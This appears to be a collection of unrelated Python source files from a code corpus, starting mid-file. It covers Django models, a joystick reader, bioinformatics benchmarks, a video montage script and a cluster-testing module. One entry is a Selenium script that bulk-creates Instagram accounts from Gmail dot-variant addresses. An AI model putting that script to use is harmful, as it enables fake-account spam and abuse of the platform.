fp = open("D:\\webCrawling\\" + str(image_no) + '.png', 'wb')
else:
return
fp.write(pic.content)
fp.close()
|
12,426 | ebd68e74f9254d8c5452b941b7b6d63fd4bfc0a4 | from django.core.validators import RegexValidator
from django.db import models
WRONG_PHONE = "Phone number must be entered in the format: '+79999999999' or '89999999999'."
class Company(models.Model):
name = models.CharField(max_length=128, db_index=True)
address = models.CharField(max_length=1024, default='')
class Meta:
db_table = 'company'
def __str__(self):
return self.name
class Contact(models.Model):
phone_regex = RegexValidator(regex=r'^(\+7|8)\d{10}$', message=WRONG_PHONE)
name = models.CharField(max_length=256)
company = models.ForeignKey(Company, models.CASCADE, related_name='contacts')
email = models.EmailField()
phone = models.CharField(validators=[phone_regex], max_length=12, null=True, blank=True)
interest = models.CharField(max_length=1024, default='', blank=True)
class Meta:
db_table = 'contacts'
|
12,427 | d78956a5bb3233305e5021b1adef39686a9f8bd9 | import ctypes
import time
from sdl2 import *
from numpy import interp
class Joystick():
def __init__(self):
SDL_Init(SDL_INIT_JOYSTICK)
self.axis = {1: 0.0, 4: 0.0}
self.button = {5: False, 1: False, 0: False}
def update(self):
event = SDL_Event()
while SDL_PollEvent(ctypes.byref(event)) != 0:
if event.type == SDL_JOYDEVICEADDED:
self.device = SDL_JoystickOpen(event.jdevice.which)
elif event.type == SDL_JOYAXISMOTION:
yval = event.jaxis.value
#yinter = int(interp(yval, [-32768, 32767], [0,255]))
#yfinal = interp(yinter, [0, 255], [-1.0, 1.0]) * -1
yinter = 0
if yval >= 0:
yinter = int(interp(yval, [0, 32767], [0,255])) * -1
elif yval < 0:
yinter = int(interp(yval, [-32768, 0], [255, 0]))
yfinal = yinter
self.axis[event.jaxis.axis] = yfinal
elif event.type == SDL_JOYBUTTONDOWN:
self.button[event.jbutton.button] = True
elif event.type == SDL_JOYBUTTONUP:
self.button[event.jbutton.button] = False
if __name__ == "__main__":
joystick = Joystick()
while True:
joystick.update()
time.sleep(0.1)
print("Axis", joystick.axis)
print("Button", joystick.button)
if joystick.button[5]:
print("pressed")
|
12,428 | 26e85e738d81123525cf0aa0740e13daf247ffb7 | def duplicate_remover(word):
"""
>>> duplicate_remover("abbaca")
'ca'
>>> duplicate_remover("azxxzy")
'ay'
"""
stack = []
for t in word:
if len(stack) == 0:
stack.append(t)
elif t == stack[-1]:
stack.pop()
else:
stack.append(t)
return "".join(stack)
if __name__ == '__main__':
from doctest import testmod
testmod(verbose=True)
|
12,429 | a65d53f5f95c66837759a62bafde9c0720e4fd17 | # -*- coding: utf-8 -*-
#
# Chinese.Update Reversal Sort Fields
# - A FlexTools Module -
#
# Finds the Chinese Reversal Index and uses the Hanzi field and
# Pinyin Numbered fields to populate the Sort field. See the
# documentation below for the Writing System codes.
#
# C D Farrow
# May 2011
#
# Platforms: Python .NET and IronPython
#
from __future__ import unicode_literals
from builtins import str
from FTModuleClass import *
import site
site.addsitedir(r"Lib")
from ChineseUtilities import SortStringDB, ChineseWritingSystems
#----------------------------------------------------------------
# Documentation for the user:
docs = {FTM_Name : "Update Reversal Index Sort Field",
FTM_Version : "4.0",
FTM_ModifiesDB : True,
FTM_Synopsis : "Updates the Chinese sort field in the Chinese Reversal Index. Sorts by pronunciation.",
FTM_Help : r"Doc\Chinese Utilities Help.pdf",
FTM_Description:
"""
This module sets the sort field in the Chinese Reversal Index ('Chinese, Mandarin (China)' (zh-CN))
The sort field (zh-CN-x-zhsort) is generated from the Chinese Hanzi (zh-CN) field and
Pinyin Numbered (zh-CN-x-pyn) field.
The three writing systems mentioned above must be configured in FLEx
under Tools | Configure | Setup Writing Systems. Note that fields using
the old 'cmn' locale are also supported, but this locale code should not be used in
new projects.
The Pinyin tone number field should first be generated from the Hanzi
(zh-CN) field using either the Update_Tonenumber_Fields FLExTools Module
or the BulkEdit_HZ_2_Tonenumber transducer.
The sort field produced by this Module orders Chinese by pronunciation, then
by stroke count, and finally by stroke order. This follows the ordering in
现代汉语词典 (XianDai HanYu CiDian). Thus:
- san < sen < shan < sheng < si < song: 三 < 森 < 山 < 生 < 四 < 送
- lu < lü < luan < lüe: 路 < 绿 < 乱 < 掠
- (stroke count) 录 < 录音 < 路 < 路口
- (stroke order) zhi4 with 8 strokes: 郅 < 制 < 质 < 治
See Chinese Utilities Help.pdf for detailed information on configuration and usage.
""" }
#----------------------------------------------------------------
# The main processing function
UpdatedSortStrings = 0
def UpdateReversalSortFields(project, report, modifyAllowed=False):
def __WriteSortString(project, entry):
global UpdatedSortStrings
# Note that project is passed to each of these local functions otherwise
# project is treated as a global and isn't released for garbage collection.
# That keeps the project locked so FT has to be restarted to use
# that project again.
hz = project.ReversalGetForm(entry, ChineseWS)
tn = project.ReversalGetForm(entry, ChineseTonenumWS)
ss = project.ReversalGetForm(entry, ChineseSortWS)
newSortString, msg = SortDB.CalculateSortString(hz, tn, ss)
if msg:
report.Warning(" %s: %s" % (hz, msg),
project.BuildGotoURL(entry))
if newSortString is not None:
report.Info((" Updating %s: (%s + %s) > %s" if modifyAllowed else
" %s needs updating: (%s + %s) > %s") \
% (hz, hz, tn, newSortString))
if modifyAllowed:
project.ReversalSetForm(entry, newSortString, ChineseSortWS)
UpdatedSortStrings += 1
# (Subentries don't need the sort string)
ChineseWS,\
ChineseTonenumWS,\
ChineseSortWS = ChineseWritingSystems(project, report, Hanzi=True, Tonenum=True, Sort=True)
if not ChineseWS or not ChineseTonenumWS or not ChineseSortWS:
report.Error("Please read the instructions and configure the necessary writing systems")
return
else:
report.Info("Using writing systems:")
report.Info(" Hanzi: %s" % project.WSUIName(ChineseWS))
report.Info(" Tone number Pinyin: %s" % project.WSUIName(ChineseTonenumWS))
report.Info(" Chinese sort field: %s" % project.WSUIName(ChineseSortWS))
SortDB = SortStringDB()
index = project.ReversalIndex(ChineseWS)
if index:
report.ProgressStart(index.AllEntries.Count)
report.Info("Updating sort strings for '%s' reversal index"
% project.WSUIName(ChineseWS))
for entryNumber, entry in enumerate(project.ReversalEntries(ChineseWS)):
report.ProgressUpdate(entryNumber)
__WriteSortString(project, entry)
report.Info((" %d %s updated" if modifyAllowed else
" %d %s to update") \
% (UpdatedSortStrings, "entry" if (UpdatedSortStrings==1) else "entries"))
#----------------------------------------------------------------
FlexToolsModule = FlexToolsModuleClass(runFunction = UpdateReversalSortFields,
docs = docs)
#----------------------------------------------------------------
if __name__ == '__main__':
FlexToolsModule.Help()
|
12,430 | aed0d738fab9c3a1d093aea4297273bcaadcb558 |
def main():
n = map(int, input().split())
n_sorted = sorted(n)
if n_sorted[0] + n_sorted[1] == n_sorted[2]:
print('Yes')
else:
print('No')
if __name__ == "__main__":
main()
|
12,431 | aec3cd40d6fcba1a6cd80b3565a73c1eca84cc39 | import numpy as np
import sys
def create_Tensor(f):
counter = 0
# Tensor for Interlinks
if(f):
for i in range(nr):
counter = counter + 1
for j in range(nn):
f = i % nn
s = j
l = i / (nn*nl)
if (counter % (nn * nl) == 0):
counter = 0
else:
pass
th = counter / nn
ti[f][s][th][l] = lines[i][j]
#print (str([f , s, th, l]) + str(ti[f][s][th][l]))
else:
# Tensor for Intralinks
for i in range(total):
for j in range(nn):
f = i % nn
s = j
th = i / nn
t[f][s][th] = lines[i][j]
def Create_Adj_From_Tensor(fl):
# For Interlinks
if (fl):
for f in range(nl):
for th in range (nl):
for i in range (nn):
for j in range(nn):
ai = i + f * nn
aj = j + th * nn
a[ai][aj] = ti[i][j][th][f]
print('Interlink Adjacency Matrix Done')
# For Intralinks
else:
for l in range (nl):
for i in range(nn):
for j in range(nn):
ai = l * nn + i
aj = l * nn + j
a[ai][aj] = t[i][j][l]
def Display_Matrix(a):
for i in range(total):
for j in range(total):
print str(a[i][j]) + ' ',
print ''
print ('\n')
def check_for_interlinks(r):
if(r == nn*nl*nl):
print('Interlinks are present and Network is Multiplex Network')
return True
elif(r == nn*nl):
print('Only Intralinks are present and Network is Multilayer Network')
return False
filename = sys.argv[1]
file = open(filename, "r")
lines = []
nn = nl = n = l = li = nr = 0
flag = True
for line in file:
parts = line.split()
if parts[0] == "Nodes":
n = parts[1]
elif parts[0] == "Layers":
l = parts[1]
else:
lines.append(parts)
nr = nr + 1
#print ('Total Lines in file are' + str (nr))
nn = int(n)
nl = int(l)
total = nn*nl
a = np.zeros((total,total))
t = np.zeros((nn,nn,nl))
ti = np.zeros((nn,nn,nl,nl))
flag = check_for_interlinks(nr)
create_Tensor(flag)
Create_Adj_From_Tensor(flag)
Display_Matrix(a) |
12,432 | c6da4538c037def6c830de0ddd0791c408e32607 | import bal
ch=1
while ch!=4:
print("1.Check Balance\n2.Deposit \n3.Withdrwal\n4.Exit")
ch=int(input("Enter your choice\n"))
if(ch==1):
print("Balance is",bal.bal)
if(ch==2):
amt=int(input("Enter amount for deposit"))
bal.bal+=amt
print("updated balance is:",bal.bal)
if(ch==3):
amt=int(input("Enter amount for withdrawal"))
if(amt<=1000):
print("insufficient balance")
else:
bal.bal-=amt
print("updated balance is:",bal.bal)
if(ch==4):
exit()
ch=ch+1 |
12,433 | 646113195f6b9a128d38fdb65cd8a222d9771354 | import time
import numpy as np
from schicluster import *
from sklearn.cluster import KMeans, SpectralClustering
from sklearn.metrics.cluster import adjusted_rand_score as ARI
mm9dim = [197195432, 181748087, 159599783, 155630120, 152537259, 149517037, 152524553, 131738871, 124076172, 129993255,
121843856, 121257530, 120284312, 125194864, 103494974, 98319150, 95272651, 90772031, 61342430]
hg19dim = [249250621, 243199373, 198022430, 191154276, 180915260, 171115067, 159138663, 146364022, 141213431, 135534747,
135006516, 133851895, 115169878, 107349540, 102531392, 90354753, 81195210, 78077248, 59128983, 63025520,
48129895, 51304566, 155270560]
# File list and labels of dataset Ramani 2017
ctlist = ['HeLa', 'HAP1', 'GM12878', 'K562']
network = [np.loadtxt('1mb_resolution/' + ct + '/sample_list.txt', dtype=np.str) for ct in ctlist]
label = np.array([ctlist[i] for i in range(len(ctlist)) for j in range(len(network[i]))]).astype('U8')
network = np.concatenate(network)
chrom = [str(i + 1) for i in range(22)] + ['X']
chromsize = {chrom[i]: hg19dim[i] for i in range(len(chrom))}
nc = 4
# CpG content for each bin
cg = np.loadtxt('hg19/bin/hg19.1mb.bin.CpG.txt', dtype=np.str, skiprows=1, usecols=(0, 9, 11, 12))
cgdata = cg[:, 1:].astype(float)
cgdata = cgdata[:, 2] / (cgdata[:, 1] - cgdata[:, 0])
cgdata[np.isnan(cgdata)] = 0.0
chrcg = {c: cgdata[cg[:, 0] == 'chr' + c] for c in chrom}
# scHiCluster GPU
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
# scHiCluster CPU
start_time = time.time()
cluster, embedding = hicluster_cpu(network, chromsize, nc=nc, ncpus=5)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
# PCA
start_time = time.time()
cluster, embedding = raw_pca(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
ndim in [2, 5, 10, 20, 50]]
# Downsample reads to uniform the coverage of all the cells before PCA
start_time = time.time()
cluster, embedding = ds_pca(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
in [2, 5, 10, 20, 50]]
# Use compartment score (PC1) of single cells
start_time = time.time()
cluster, embedding = compartment(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
in [2, 5, 10, 20, 50]]
# Use contact-distance decay curve
start_time = time.time()
cluster, embedding = decay(network, chromsize, nc=nc)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
in [2, 5, 10, 20, 50]]
# scHiCluster without linear convolution
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, pad=0)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
in [2, 5, 10, 20, 50]]
# scHiCluster without random walk
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, rp=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, :ndim]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, :ndim]).labels_) for ndim
in [2, 5, 10, 20, 50]]
# scHiCluster without keeping the top elements
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, prct=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
ndim in [2, 5, 10, 20, 50]]
np.save('/cellar/users/zhoujt1994/projects/scHiC/' + dataset + '/embedding/1mb_pad1_rwr_real.npy', embedding)
# Random walk only
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, pad=0, prct=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
ndim in [2, 5, 10, 20, 50]]
# Linear convolution only
start_time = time.time()
cluster, embedding = hicluster_gpu(network, chromsize, nc=nc, rp=-1, prct=-1)
print(time.time() - start_time)
[ARI(label, KMeans(n_clusters=nc, n_init=200).fit(embedding[:, 1:(ndim + 1)]).labels_) for ndim in [2, 5, 10, 20, 50]]
[ARI(label, SpectralClustering(n_clusters=nc, affinity='nearest_neighbors').fit(embedding[:, 1:(ndim + 1)]).labels_) for
ndim in [2, 5, 10, 20, 50]]
|
12,434 | d05902d29984c21e37d079553be4ce5276a3bdcf |
from selenium import webdriver
import time
mails=["akhtamahendra@gmail.com","a.khtamahendra@gmail.com","ak.htamahendra@gmail.com","akh.tamahendra@gmail.com","akht.amahendra@gmail.com","akhta.mahendra@gmail.com","akhtam.ahendra@gmail.com","akhtama.hendra@gmail.com","akhtamah.endra@gmail.com","akhtamahe.ndra@gmail.com"] #Add 10 emails within the quotes
users=["ahmad","zakky","rahman","firhan","noer","mashitoh","ahung","Isabelle","Apolline","Cameron"] #Add 10 usernames within the quotes
names=["schoolworshipper","zetachunk","caiklot_23","broughtfunctional","floridasidereal","roiderbankspolythene","grimacingunique","icehockeyinterfere","polyethenetoyah","rawchickencelery"] #Add 10 names within the quotes
pas="Input Password"
for x in range (0,len(mails)):
browser=webdriver.Firefox()
browser.get("https://instagram.com")
time.sleep(2)
email=browser.find_elements_by_class_name("_qy55y")[0]
name=browser.find_elements_by_class_name("_qy55y")[1]
username=browser.find_elements_by_class_name("_qy55y")[2]
password=browser.find_elements_by_class_name("_qy55y")[3]
email.send_keys(mails[x])
name.send_keys(names[x])
browser.execute_script("document.getElementsByClassName(\"_qy55y\")[2].value=\"\"")
username.send_keys(users[x])
password.send_keys(pas)
time.sleep(2)
browser.find_elements_by_class_name("_1on88")[1].click()
browser.quit()
|
12,435 | 21593bab14cd42ad860f2e01b5d8f93ecb68320a | import os
from django.test import TestCase
from partner.util import load_choices
HERE = os.path.abspath(os.path.dirname(__file__))
# Create your tests here.
class TestChoiceLoader(TestCase):
def test_choices_are_loaded(self):
choices = load_choices(os.path.join(HERE, 'states.txt'), True)
self.assertEqual(len(choices), 50)
self.assertIn(('OR', 'Oregon'), choices)
|
12,436 | 26f5ec2d738c2262f91cce8ba0f0f62e28fa5ce2 | from accounts.models import User
from .models import Question, Answer, Tag
import requests
import json
def get_questions():
"""
Fetch Questions from eosio.stackexchange
"""
count = 1
for i in range(6):
r = requests.get('https://api.stackexchange.com/2.2/questions?filter=withbody&site=eosio&pagesize=100&page={}'.format(count))
data = json.loads(r.text)
for item in data['items']:
own = item['owner']['user_id']
dsp = item['owner']['display_name']
try:
owner = User.objects.get(username=own, se_display_name=dsp)
except Exception:
owner = None
tags = item['tags']
ts = []
if owner:
for tag in tags:
t, created = Tag.objects.get_or_create(name=tag)
ts.append(t)
q = Question.objects.create(owner=owner, se_question_id=item['question_id'], title=item['title'], body=item[
'body'], se_link=item['link'], is_answered=item['is_answered'], score=item['score'])
for t in ts:
q.tags.add(t)
q.save()
count += 1
print(count)
def get_answers():
"""
Fetch Answers from Stackexchange
"""
count = 1
for i in range(200): # TODO : Fetch number of all items first
r = requests.get('http://api.stackexchange.com/2.2/answers?site=eosio&filter=!b1MMEb*6iF.PM5&pagesize=100&page={}'.format(count))
data = json.loads(r.text)
for item in data['items']:
own = item['owner']['user_id']
dsp = item['owner']['display_name']
qn_id = item['question_id']
try:
owner = User.objects.get(username=own, se_display_name=dsp)
question = Question.objects.get(se_question_id=qn_id)
except Exception:
owner = None
question = None
if owner and question:
Answer.objects.create(owner=owner, question=question, body=item['body'],
se_question_id=qn_id, is_accepted=item['is_accepted'],
se_answer_id=item['answer_id'], score=item['score'])
count += 1
print(count)
|
12,437 | 9ec0eb5c7974388db836106e8848f96e32c902f1 | from __future__ import unicode_literals
from cities_light.models import City
from django.contrib.contenttypes.models import ContentType
from ...example_apps.autocomplete_test_case_app.models import Group, User
from .case import *
class AutocompleteGenericMock(autocomplete_light.AutocompleteGenericBase):
choices = (
User.objects.filter(pk__lt=10),
Group.objects.filter(pk__lt=10),
)
search_fields = (
('username', 'email'),
('name',),
)
limit_choices = 3
class FormMock(forms.Form):
x = autocomplete_light.GenericModelChoiceField(
widget=autocomplete_light.ChoiceWidget(
autocomplete=AutocompleteGenericMock))
class AutocompleteGenericTestCase(AutocompleteTestCase):
autocomplete_mock = AutocompleteGenericMock
def assert_choices_equal(self, result, test):
self.assertEqual(list(result), test['expected'])
def get_choices_for_values_tests(self):
return (
{
'fixture': [
'%s-%s' % (self.user_ctype.pk, self.james.pk),
'%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
],
'expected': [
self.james,
self.bluesmen,
]
},
{
'fixture': [
'%s-%s' % (self.user_ctype.pk, self.james.pk),
'%s-%s' % (self.user_ctype.pk, self.elton.pk),
'%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
'%s-%s' % (self.group_ctype.pk, self.emos.pk),
],
'expected': [
self.james,
self.bluesmen,
],
'name': 'should ignore values that are not in the querysets',
},
)
def get_choices_for_request_tests(self):
return (
{
'fixture': make_get_request('j'),
'expected': [
self.abe,
self.rockers,
self.bluesmen,
],
},
{
'fixture': make_get_request('q=elton'),
'expected': [],
'name': 'should not propose models that are not in the qs',
},
)
def get_validate_tests(self):
return (
{
'fixture': [
'%s-%s' % (self.user_ctype.pk, self.james.pk),
'%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
'%s-%s' % (self.group_ctype.pk, self.emos.pk),
],
'expected': False,
},
{
'fixture': [
'%s-%s' % (self.user_ctype.pk, self.james.pk),
'%s-%s' % (self.group_ctype.pk, self.bluesmen.pk),
],
'expected': True,
},
{
'fixture': [],
'expected': True,
},
{
'fixture': ['bla'],
'expected': False,
},
{
'fixture': ['123123-123123'],
'expected': False,
},
)
def get_autocomplete_html_tests(self):
return []
def get_widget_tests(self):
return (
{
'form_class': FormMock,
'fixture': 'x=%s-%s' % (
self.group_ctype.pk, self.bluesmen.pk),
'expected_valid': True,
'expected_data': self.bluesmen,
},
{
'form_class': FormMock,
'fixture': 'x=%s-%s' % (
self.group_ctype.pk, self.emos.pk),
'expected_valid': False,
},
{
'form_class': FormMock,
'fixture': 'x=12343-2',
'expected_valid': False,
},
{
'form_class': FormMock,
'fixture': 'x=%s-2' % ContentType.objects.get_for_model(
City).pk,
'expected_valid': False,
},
)
def test_default_search_fields(self):
class MyGeneric(autocomplete_light.AutocompleteGenericBase):
choices = [Group.objects.all()]
self.assertEqual(MyGeneric.search_fields, [('name',)])
|
12,438 | 799bc3c6e8e84d322887452077299de92c2442a3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from textteaser.parser import Parser
from flask import Flask
from flask import render_template
from flask import send_from_directory
from flask import request
DEBUG = True
THRESHOLD = 0.5
app = Flask(__name__)
text = ''
@app.route('/css/<path:path>')
def sendCss(path):
return send_from_directory('css', path)
@app.route("/whiteout", methods=['GET'])
def index():
return render_template('whiteout.html', text=text, cleaned=[])
@app.route("/whiteout", methods=['POST'])
def clean():
text = request.form['text']
w = Whiteout()
if DEBUG:
sentences = w.cleanWithScore(text)
else:
sentences = w.clean(text)
return render_template('whiteout.html', text=text, cleaned=sentences)
class Whiteout:
def __init__(self):
self.parser = Parser()
self.initDict()
def initDict(self):
self.words = set()
self.addWordsFromList('data/20k.txt')
self.addWordsFromList('data/wordnet.txt')
self.addWordsFromList('data/mydict.txt')
def addWordsFromList(self, list):
with open(list) as file:
words = file.readlines()
for word in words:
self.words.add(word.strip())
def clean(self, text):
sentences = self.parser.splitSentences(text)
cleaned = []
return [sentence for sentence in sentences
if self.sentenceScore(sentence) >= THRESHOLD]
def cleanWithScore(self, text):
sentences = self.parser.splitSentences(text)
cleaned = []
# return [sentence for sentence in sentences
# if self.sentenceScore(sentence) >= THRESHOLD]
for sentence in sentences:
score = self.sentenceScore(sentence)
if (score >= THRESHOLD):
cleaned.append("{:1.3f}".format(score))
cleaned.append(sentence)
# cleaned.append(self.cleanSentence(sentence))
return cleaned
def sentenceScore(self, sentence):
sentence = self.parser.removePunctations(sentence)
words = self.parser.splitWords(sentence)
count = 0.0
for word in words:
if word in self.words and len(word) > 1:
count = count + 1
if len(words) == 0:
return 0.0
return count / len(words) |
12,439 | fac491b840dbd8560c8a764ffb01d15ce9a68e12 | #импортирую библиотеки
from moviepy import *
from moviepy.editor import *
from pygame import *
#склеиваю видео
c11 = VideoFileClip("ZlatanI.mp4")
c11
c11 = c11.subclip(55,157)
c11 = c11.margin(20)
c12 = c11.fx(vfx.mirror_x)
c13 = c11
c14 = c11.fx(vfx.mirror_x)
Zlatan = clips_array([[c11,c12],[c13,c14]])
Zlatan.resize(width=360)
ZEBEST = ImageClip("TinaT.jpg")
ZEBEST.preview()
Justin = ImageSequenceClip(["BIB1.jpg","BIB2.jpg","BIB3.jpg","BIB4.jpg"], fps=5)
Justin.resize(width=360)
BieberGif = VideoFileClip("BIB5.gif")
# на Windows нет ImageMagick
#TX = TextClip("THe NEW VIRAL YOUTUBE VIDEO!!!!",fontsize=70,color='black')
#TX = txt_clip.set_pos('center').set_duration(10)
#W=ImageClip("white", fps = 10)
#TXT = CompositeVideoClip([W,TX])
#TXT.resize(width=360)
#TXT2 = TextClip("Give me my Oscar!",fontsize=70,color='white')
#TXT2 = txt_clip.set_pos('center').set_duration(10)
Kim = VideoFileClip("KIM.mp4")
Kim.resize(width=360)
Kim = Kim.fx(vfx.blackwhite)
lapka44 = concatenate_videoclips([Justin, Zlatan, Kim, BieberGif])
# редактирую звуковые дорожки
#Leps1 = AudioFileClip("Luis Fonsi.mp3").subclip(0,122)
#Leps2 = AudioFileClip("RussianPride.mp3").subclip(0,71)
#Leps3 = AudioFileClip("Luis Fonsi.mp3").subclip(0,13)
#рендер (Final Cut Pro)
#Zlatan.preview(fps=25) |
12,440 | 715f6398d4ab90effdf17dbc26cc3638026f6ab5 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2019-09-24 20:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='LianJiaTenementHouse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('house_name', models.CharField(max_length=32, verbose_name='房源名称')),
('platform', models.CharField(default='链家网', max_length=6)),
('house_message', models.CharField(max_length=64, verbose_name='房源信息')),
('price', models.DecimalField(decimal_places=2, default='99999', max_digits=8, verbose_name='租金')),
('lon', models.DecimalField(decimal_places=6, default=0, max_digits=10, verbose_name='经度')),
('lat', models.DecimalField(decimal_places=6, default=0, max_digits=10, verbose_name='纬度')),
('url', models.CharField(max_length=148, verbose_name='具体链接')),
('images', models.CharField(max_length=64, verbose_name='图片')),
],
options={
'db_table': 'LianJia_table',
},
),
]
|
12,441 | ebacb34c6caba2bdd4f41cecf77dd732a7e77a67 | '''CTS: Cluster Testing System: Main module
Classes related to testing high-availability clusters...
'''
__copyright__='''
Copyright (C) 2000, 2001 Alan Robertson <alanr@unix.sh>
Licensed under the GNU GPL.
'''
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
import types, string, select, sys, time, re, os, struct, signal
import time, syslog, random, traceback, base64, pickle, binascii, fcntl
from socket import gethostbyname_ex
from UserDict import UserDict
from subprocess import Popen,PIPE
from cts.CTSvars import *
class CtsLab(UserDict):
'''This class defines the Lab Environment for the Cluster Test System.
It defines those things which are expected to change from test
environment to test environment for the same cluster manager.
It is where you define the set of nodes that are in your test lab
what kind of reset mechanism you use, etc.
This class is derived from a UserDict because we hold many
different parameters of different kinds, and this provides
provide a uniform and extensible interface useful for any kind of
communication between the user/administrator/tester and CTS.
At this point in time, it is the intent of this class to model static
configuration and/or environmental data about the environment which
doesn't change as the tests proceed.
Well-known names (keys) are an important concept in this class.
The HasMinimalKeys member function knows the minimal set of
well-known names for the class.
The following names are standard (well-known) at this time:
nodes An array of the nodes in the cluster
reset A ResetMechanism object
logger An array of objects that log strings...
CMclass The type of ClusterManager we are running
(This is a class object, not a class instance)
RandSeed Random seed. It is a triple of bytes. (optional)
The CTS code ignores names it doesn't know about/need.
The individual tests have access to this information, and it is
perfectly acceptable to provide hints, tweaks, fine-tuning
directions or other information to the tests through this mechanism.
'''
def __init__(self):
self.data = {}
self.rsh = RemoteExec(self)
self.RandomGen = random.Random()
self.Scenario = None
# Get a random seed for the random number generator.
self["LogWatcher"] = "any"
self["LogFileName"] = "/var/log/messages"
self["OutputFile"] = None
self["SyslogFacility"] = "daemon"
self["CMclass"] = None
self["logger"] = ([StdErrLog(self)])
self.SeedRandom()
def SeedRandom(self, seed=None):
if not seed:
seed = int(time.time())
if self.has_key("RandSeed"):
self.log("New random seed is: " + str(seed))
else:
self.log("Random seed is: " + str(seed))
self["RandSeed"] = seed
self.RandomGen.seed(str(seed))
def HasMinimalKeys(self):
'Return TRUE if our object has the minimal set of keys/values in it'
result = 1
for key in self.MinimalKeys:
if not self.has_key(key):
result = None
return result
def log(self, args):
"Log using each of the supplied logging methods"
for logfcn in self._logfunctions:
logfcn(string.strip(args))
def debug(self, args):
"Log using each of the supplied logging methods"
for logfcn in self._logfunctions:
if logfcn.name() != "StdErrLog":
logfcn("debug: %s" % string.strip(args))
def dump(self):
keys = []
for key in self.keys():
keys.append(key)
keys.sort()
for key in keys:
self.debug("Environment["+key+"]:\t"+str(self[key]))
def run(self, Scenario, Iterations):
if not Scenario:
self.log("No scenario was defined")
return 1
self.log("Cluster nodes: ")
for node in self["nodes"]:
self.log(" * %s" % (node))
if not Scenario.SetUp():
return 1
try :
Scenario.run(Iterations)
except :
self.log("Exception by %s" % sys.exc_info()[0])
for logmethod in self["logger"]:
traceback.print_exc(50, logmethod)
Scenario.summarize()
Scenario.TearDown()
return 1
#ClusterManager.oprofileSave(Iterations)
Scenario.TearDown()
Scenario.summarize()
if Scenario.Stats["failure"] > 0:
return Scenario.Stats["failure"]
elif Scenario.Stats["success"] != Iterations:
self.log("No failure count but success != requested iterations")
return 1
return 0
def __setitem__(self, key, value):
'''Since this function gets called whenever we modify the
dictionary (object), we can (and do) validate those keys that we
know how to validate. For the most part, we know how to validate
the "MinimalKeys" elements.
'''
#
# List of nodes in the system
#
if key == "nodes":
self.Nodes = {}
for node in value:
# I don't think I need the IP address, etc. but this validates
# the node name against /etc/hosts and/or DNS, so it's a
# GoodThing(tm).
try:
self.Nodes[node] = gethostbyname_ex(node)
except:
print node+" not found in DNS... aborting"
raise
#
# List of Logging Mechanism(s)
#
elif key == "logger":
if len(value) < 1:
raise ValueError("Must have at least one logging mechanism")
for logger in value:
if not callable(logger):
raise ValueError("'logger' elements must be callable")
